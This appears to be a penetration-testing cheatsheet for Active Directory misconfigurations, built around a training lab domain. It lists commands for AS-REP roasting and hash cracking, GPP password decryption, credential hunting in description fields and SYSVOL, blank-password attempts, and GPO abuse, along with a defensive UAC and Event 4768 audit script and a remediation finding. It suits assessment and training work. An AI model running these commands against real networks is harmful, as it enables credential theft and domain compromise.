Methodology Checklist
- Check for Exchange Windows Permissions group members (WriteDACL on domain)
- Check for PrivExchange vulnerability (Exchange HTTP auth to LDAP relay)
- Enumerate printer spooler service on DCs: `ls \\[DC]\print$`
- Check for weak GPO permissions: `Get-GPO -All \| Get-GPPermissions`
- Look for AS-REP roastable users: `Get-DomainUser -PreauthNotRequired`
- Enumerate ms-DS-MachineAccountQuota: if >0, non-privileged users can add machine accounts
- Check Shadow Credentials: `Get-DomainObject -Identity [USER] \| select msds-keycredentiallink`
Operational Context
Use when: Standard AD attack paths are exhausted; check for Exchange Windows Permissions, AS-REP Roasting, PASSWD_NOTREQD accounts, and shadow credentials.
Think Dumber First: AS-REP Roasting requires no creds at all: run `impacket-GetNPUsers [DOMAIN]/ -usersfile users.txt -format hashcat` against every user. Any account with DONT_REQUIRE_PREAUTH set returns a crackable hash.
Skip when: All standard paths (Kerberoasting, ACL abuse, spraying) are still available; exhaust targeted attacks before hunting misc misconfigs.
Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| `adidnsdump -u [DOMAIN]\[USER] ldap://[DC_IP] -r` | Enumerate all AD DNS records including hidden hosts (use -r to resolve unknown records) |
| `Get-DomainUser * \| Select-Object samaccountname,description \| Where-Object {$_.Description -ne $null}` | Hunt for passwords in user Description fields |
| `ls \\[DC]\SYSVOL\[DOMAIN]\scripts` | List SYSVOL scripts directory |
| `gpp-decrypt [CPASSWORD]` | Decrypt GPP cpassword (MS released the AES key) |
| `nxc smb [DC_IP] -u [USER] -p [PASS] -M gpp_autologon` | CME: extract GPP autologon credentials |
| `nxc smb [DC_IP] -u [USER] -p [PASS] -M gpp_password` | CME: extract GPP password entries |
| `Get-DomainUser -PreauthNotRequired \| select samaccountname,useraccountcontrol` | Find ASREPRoastable users (DONT_REQ_PREAUTH flag) |
| `.\Rubeus.exe asreproast /user:[USER] /nowrap /format:hashcat` | Request AS-REP for a specific user |
| `GetNPUsers.py [DOMAIN]/ -dc-ip [DC_IP] -no-pass -usersfile users.txt` | Linux ASREPRoasting: request AS-REPs for users without pre-auth |
| `hashcat -m 18200 asrep_hash.txt /usr/share/wordlists/rockyou.txt` | Crack AS-REP hash (mode 18200, not 13100) |
| `Import-Module .\SecurityAssessment.ps1` | Load SecurityAssessment module for spooler checks |
| `Get-SpoolStatus -ComputerName [DC_FQDN]` | Check if Print Spooler is running on a DC |
| `$sid=Convert-NameToSid "Domain Users"` | Get SID of Domain Users group |
| `Get-DomainGPO \| Get-ObjectAcl \| ?{$_.SecurityIdentifier -eq $sid}` | Find GPOs that Domain Users can write to |
| `Get-GPO -Guid [GPO_GUID]` | Get GPO name from GUID |
Deep Dive & Workflow
Attack Selection by Context
| Finding | Attack | Hashcat Mode |
|---|---|---|
| User with Description containing password | Direct cred use | n/a |
| GPP XML in SYSVOL with cpassword | gpp-decrypt | n/a |
| User with DONT_REQ_PREAUTH | ASREPRoasting | 18200 |
| DC with Print Spooler running | PrintNightmare / Printer Bug coercion | n/a |
| Domain Users with GPO write rights | GPO abuse | n/a |
DNS Enumeration for Hidden Hosts
Standard scans miss hosts that don't respond to ICMP. AD DNS knows every machine:
```bash
adidnsdump -u INLANEFREIGHT\forend ldap://172.16.5.5 -r
# -r: resolve unknown records; without it you miss many entries
# Output: records.csv with all A records including unconventional hosts (Jenkins, Logistic servers, etc.)
```
Credential Hunting in Description Fields
Helpdesk sometimes stores passwords in user objects:
```powershell
Get-DomainUser * | Select-Object samaccountname,description | Where-Object {$_.Description -ne $null}
# Also check Notes, Info attributes
```
Also check SYSVOL scripts; administrators often hardcode credentials in logon scripts:
```powershell
ls \\ACADEMY-EA-DC01\SYSVOL\INLANEFREIGHT.LOCAL\scripts
# Read any .bat, .ps1, .vbs files found
```
GPP Password Decryption (MS14-025)
Microsoft published the AES key used to encrypt cpassword in Group Policy Preferences (GPP) XML files. These persist in SYSVOL long after patching:
```bash
# Automated via CME
nxc smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologon
nxc smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_password
# Manual decrypt
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ7gWgiVsZ+s+fVe20GWzc=
```
ASREPRoasting
Accounts with DONT_REQ_PREAUTH set allow anyone to request an AS-REP encrypted with their password, with no credentials required. Unlike Kerberoasting (TGS = mode 13100), AS-REP uses mode 18200:
```
# Find targets
Get-DomainUser -PreauthNotRequired | select samaccountname,useraccountcontrol
# Request tickets (Windows)
.\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat
# Request tickets (Linux, no creds needed)
GetNPUsers.py INLANEFREIGHT.LOCAL/ -dc-ip 172.16.5.5 -no-pass -usersfile valid_users.txt
# Crack offline
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt
```
Also check PASSWD_NOTREQD (UAC bit 32); if set, try a blank password immediately.
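As an added defender-side example (not part of the original cheatsheet), the Python below audits the two userAccountControl bits discussed above and filters Event ID 4768 records for TGT requests that match the AS-REP roasting pattern (pre-auth-exempt account, PreAuthType 0, RC4 0x17). The user records, event records and the 10.10.14.7 source address are constructed samples; field names follow the 4768 event XML.

```python
# Well-known userAccountControl bit values (ADS_USER_FLAG enumeration)
PASSWD_NOTREQD = 0x20        # UAC bit 32: a blank password may be accepted
DONT_REQ_PREAUTH = 0x400000  # Kerberos pre-authentication not required (AS-REP roastable)

# Constructed sample directory records: (samaccountname, userAccountControl)
SAMPLE_USERS = [
    ("forend", 0x200),                        # NORMAL_ACCOUNT only
    ("mmorgan", 0x200 | 0x400000),            # pre-auth disabled
    ("svc_legacy", 0x200 | 0x20 | 0x400000),  # pre-auth disabled and no password required
]

# Constructed sample Event 4768 (TGT request) records, field names as in the event XML
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "mmorgan", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.7"},
    {"EventID": 4768, "TargetUserName": "forend", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "172.16.5.130"},
]


def audit_uac(users):
    """Return {samaccountname: [issue, ...]} for accounts carrying risky UAC bits."""
    findings = {}
    for sam, uac in users:
        issues = []
        if uac & DONT_REQ_PREAUTH:
            issues.append("DONT_REQ_PREAUTH")
        if uac & PASSWD_NOTREQD:
            issues.append("PASSWD_NOTREQD")
        if issues:
            findings[sam] = issues
    return findings


def asrep_roast_hits(events, exempt_accounts):
    """Return (account, source IP) for 4768 events that fit AS-REP roasting: a pre-auth-exempt
    account, PreAuthType 0 (no pre-authentication) and RC4 (0x17), the etype tools request."""
    exempt = {a.lower() for a in exempt_accounts}
    return [
        (ev["TargetUserName"], ev["IpAddress"])
        for ev in events
        if ev["EventID"] == 4768
        and ev["TargetUserName"].lower() in exempt
        and ev["PreAuthType"] == "0"
        and ev["TicketEncryptionType"] == "0x17"
    ]
```

Feed `audit_uac` the output of an LDAP query for the DONT_REQ_PREAUTH bit and `asrep_roast_hits` the DC's 4768 events; a hit from an address that is not a known workstation is the alert the Reporting Trigger below asks for.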
GPO Abuse
If your compromised account (or Domain Users) has write access to a GPO, it can push malicious configurations to all computers/users in the linked OU:
```powershell
$sid = Convert-NameToSid "Domain Users"
Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid}
Get-GPO -Guid [GPO_GUID] # translate GUID to name
```
Caution: Check how many computers the GPO applies to before using SharpGPOAbuse. A domain-wide GPO = maximum noise.
Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| AS-REP roasting returns no hashes | No accounts with preauth disabled | Check with creds: `GetNPUsers [DOMAIN]/[USER]:[PASS] -request` to enumerate specifically |
| PASSWD_NOTREQD accounts won't authenticate | Account may still require password | Test explicitly: `nxc smb [TARGET] -u [USER] -p ''` (blank password attempt) |
| Exchange Windows Permissions abuse fails | Exchange not installed | Verify: `Get-ADGroupMember 'Exchange Windows Permissions'`; empty = no Exchange |
| Shadow credentials attack fails | PKINIT not configured | Requires AD CS with PKINIT; check: `certutil -config - -ping` from domain host |
| AdminSDHolder abuse propagation slow | SDProp runs hourly | Wait up to 60 minutes for SDProp to propagate ACL from AdminSDHolder to protected objects |
Reporting Trigger
Finding Title: AS-REP Roasting Yields Crackable Hashes for Accounts Without Preauth
Impact: Accounts with Kerberos pre-authentication disabled return TGT hashes without requiring any authentication, enabling offline password cracking without generating authentication failure logs on the domain controller.
Root Cause: Kerberos pre-authentication disabled on user accounts (legacy application requirement or misconfiguration). No monitoring on AS-REP requests from unknown sources.
Recommendation: Enable Kerberos pre-authentication on all user accounts. Alert on AS-REP responses for accounts with pre-auth disabled. Audit UAC flags for DONT_REQUIRE_PREAUTH. Implement fine-grained password policies for accounts requiring pre-auth exemption.